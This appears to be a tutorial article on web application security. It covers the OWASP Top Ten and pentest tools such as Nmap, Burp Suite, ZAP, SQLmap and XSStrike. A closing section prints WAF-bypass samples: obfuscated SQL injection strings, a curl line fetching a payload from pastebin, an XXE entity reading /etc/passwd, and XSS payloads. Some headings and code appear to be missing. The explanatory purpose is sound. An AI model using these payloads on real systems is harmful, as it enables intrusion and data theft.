Security of web applications (websites, online stores, personal accounts) and APIs is not as easy as it might seem to be at first glance. There are several reasons:
- Web applications are available 24/7, and an attacker can launch an attack at any time;
- Web applications are a stack of different technologies, the interaction of which is sometimes difficult to implement;
- Web applications are often self-written and, unfortunately, this does not make them more secure;
- Web applications are initially developed to improve the company’s image and obtain economic benefits, and their security is not the first thing to think about;
- Thanks to the web application, you can get a variety of valuable information, ranging from user data to the developments of the owner company.
Of course, web developers try to prevent the emergence of vulnerabilities, but for the reasons described earlier, it is not always possible to avoid. To understand the current types of web application vulnerabilities, it is enough to turn to one of the most authoritative web security projects – OWASP. Among other things, the resource contains a list of the most dangerous and relevant vulnerabilities of web applications called OWASP Top Ten:
- A1 – Injections;
- A2 – Authentication weaknesses;
- A3 – Disclosure of confidential data;
- A4 – XML External Entities (XXE);
- A5 – Disadvantages of access control;
- A6 – Incorrect setting of security parameters;
- A7 – Cross-site scripting (XSS);
- A8 – Insecure deserialization;
- A9 – Using components with known vulnerabilities;
- A10 – Disadvantages of Logging and Monitoring.
Typically, the security of a web application consists of:
- conducting penetration testing ;
- analysis of source code for vulnerabilities;
- use of monitoring and threat detection systems: WAF, SIEM;
- audit of the web server and web environment.
With the pentest, it’s understandable. You hire a specialist (pentester) or a group of specialists who test the web application “from A to Z” and provide a ready-made report on the problems found with recommendations for their elimination. The use of means of protection is also not the most difficult issue, which, as a rule, comes down to the choice of a vendor based on the criterion of price / functionality ratio. But let’s dwell on an independent analysis of a web application in a little more detail.
The use of various testing tools will allow the developer to independently analyze the web application, detect and fix vulnerabilities before an attacker finds and exploits them. To do this, you can use special distributions that have the necessary set of tools and are designed to conduct penetration testing. One such distribution is Kali Linux. But if the tool you are interested in was not found, then you can use the truly bottomless resource Github. Nevertheless, the Kali Linux toolkit is mostly sufficient for most of the needs of a penetration test.
The information is provided for informational purposes only. Do not break the law!
First of all, you need to understand what other network services are available at the address where the web application is located. To conduct this scanning using Nmap:
# nmap -v 192.168.x.x.
Nmap has quite a few scanning features that can be combined, for example:
- scan TCP and UDP ports;
- define services;
- collect banners and more.
If you find open ports, you need to check the services and try to collect as much information about them as possible by adding the -sV: switch
# nmap -v 192.168.x.x -sV.
The tool also supports a huge number of scripts written in the Lua language, which will help automate the collection of information about the purpose of testing. Under certain conditions, Nmap can be used as a means of elevating privileges on a system.
Dirb / Dirbuster
These instruments are very similar to each other not only in name. They both allow you to recursively traverse a target site looking for directories and files that you don’t want to find. The work of the tools is based on enumerating query options using a dictionary and analyzing the response from the web server, on the basis of which a conclusion is made about the presence of a file / directory. Dirbuster differs from its counterpart in the presence of a graphical interface and the ability to conduct a “clean” bruteforce attack on directories and files, but this function is quite resource-intensive.
Search for vulnerabilities and flaws
Burp Suite (Community Edition)
Refers to the type of intercepting proxy. The main task of this multifunctional platform is to intercept requests from the browser to the web application to parse the request, edit it and send it to the destination. You can intercept requests on the fly, modify them and send them to the server using the Repeater module, analyzing the response of the web application.
A software package for automating the search and exploitation of vulnerabilities. Completely free Burp Suite with no restrictions. The functionality of these tools is quite similar. OWASP Zap’s active crawl module allows you to recursively traverse an entire site, substituting payload for whatever parameters it can find. Burp Suite has a similar module called Intruder, but you need to manually specify the parameters you want to work with. The work area is divided into 2 parts. At the bottom there are tabs with current tasks and the process of their execution, at the top there is a tree of sites that the user visits and an additional window for sending requests and receiving responses, as in the Repeater module in Burp Suite. Each component in the program settings has many customizable parameters. For example, we can set up incoming vectors for active crawling, generate dynamic SSL certificates, add HTTP session IDs, etc.
A free console web application vulnerability scanner that can work with the following types of vulnerabilities:
- file expansion (local and remote, fopen, readfile);
- injection (PHP / JSP / ASP / SQL injection and XPath injection);
- XSS (Cross Site Scripting);
- XXE (XML External Entity) embedding;
- SSRF (Server Side Request Forgery);
- use of known potentially dangerous files (thanks to the Nikto database);
- open redirects, etc.
The tool works on the principle of BlackBox testing (not the source code of the application is analyzed, but the server’s responses to requests with changed parameters). The utility first analyzes the structure of the site, searches for available scripts, analyzes the parameters, and then turns on its own fuzzer for testing. At the end of the scan, a report is generated that lists the vulnerabilities found, grouped by their type.
Acunetix Web Vulnerability Scanner (paid product)
Automates the task of monitoring the security of web applications and allows you to identify vulnerabilities in their protection before an attacker finds and exploits them. First, the program examines and forms the structure of the site, processing all found links and collecting information about all found files. Then he proceeds to test all parameters of the web application, simulating data input using a fuzzer, using substitutions of various parameters and snippets that can help detect a security hole. Among the vulnerabilities available for detection are all types of SQL injection, Cross Site Scripting, CRLF injection and much more.
Designed to automate the search and operation of SQL injection. Allows you to search for all kinds of SQL injection, working with both GET and POST requests. And if you need to process the entire request, you can save it to a file and transfer it to SQLmap in this format, specifying the parameter required for verification. When searching for and exploiting vulnerabilities, the script takes into account the specifics of the databases being investigated, be it MySQL, Oracle, PostgreSQL or Microsoft SQL Server.
XSStrike is an XSS vulnerability detection package equipped with four handwritten parsers, an intelligent payload generator, a powerful fuzzing engine, and a fast scanner. It recognizes the response using multiple parsers, and then processes the payload that is guaranteed to work with context analysis integrated into the fuzzing engine. The tool supports:
- context cracking technology;
- intelligent generation of payloads;
- support for GET & POST methods;
- support for cookies;
- WAF detection;
- handmade payloads for filtering and WAF evasion;
- hidden parameter discovery.
Web Application Firewall and bypassing it
Web Application Firewall (WAF) is a software package designed to detect and block attacks on a web application. Used as a superimposed remedy. This means that it sits in front of the main web application and analyzes inbound and outbound traffic. In real-time, it makes a decision to grant or deny access to the web application. Of course, a web application can be protected by the developers of the application itself without using WAF. But this requires additional costs, for example, employment of the information security department.
Looking ahead, it worth to say that the shortcomings of query filtering are characteristic of signature analysis. Combined analysis based on signatures and machine learning allows you to identify, among other things, various techniques for bypassing WAF.
For an improved monitoring system, WAFs are combined with other security components such as network IPS / IDS, incident management systems (SIEM), anti-fraud services, etc. Despite the high speed of operation, using only signature analysis in WAF allows attackers to bypass
filtering, for example:
q=` union/**/select+1,2,3,4 -- - q=` uni%0bon+se%0blect+1,2,3,4 -- - q=` UNunionION+SEselectLECT+1,2,3,4 -- -
In the first example, by replacing spaces between words, the entire expression will be perceived as one whole, but the web application itself will treat comments (/ ** /) and “+” as separating characters between words and perceived as spaces. Alternatively, you can split the request using URL-Encode, as in the second example. The third example shows that web applications and even WAF can use keyword filtering, and this example can help you bypass it. In this example, the protectors will filter keywords from the query such as “union” and “select”, but the query will eventually be processed by the web application as q=` UNION+SELECT+1,2,3,4 — –
Keyword searches also allow attackers to bypass filtering in the case of LFI. Try running the # cat / e? C / pa ?? wd command in the console and you might be surprised at the result.
... curl -s http://pastebin.com/raw/... -o ...
The pastebin.com resource is a pretty convenient way to share some of your notes and ideas, but it can be used by attackers to deliver payloads to a web server if the application supports loading data from external sources.
Here is a typical request with the execution of the system command: # cat / etc / passwd, the execution of which is possible due to the presence of an RCE vulnerability in a web application that allows executing commands on the server.
<!ENTITY sp SYSTEM «file:///etc/passwd»> ]>
The use of XML by web applications can lead to the injection of external XML entities, which would allow an attacker not only to read local files on the server but also to inject their own malicious code using a remote server.
<A/+/onmouseover+=+(confirm)()>alert <img onerror=a lert(1) src=a>
One of the most dangerous vulnerabilities that is often underestimated. Just one stored XSS on a site can allow an attacker to receive cookies for all users who visit the infected page.
The same as the previous option, only using JSON.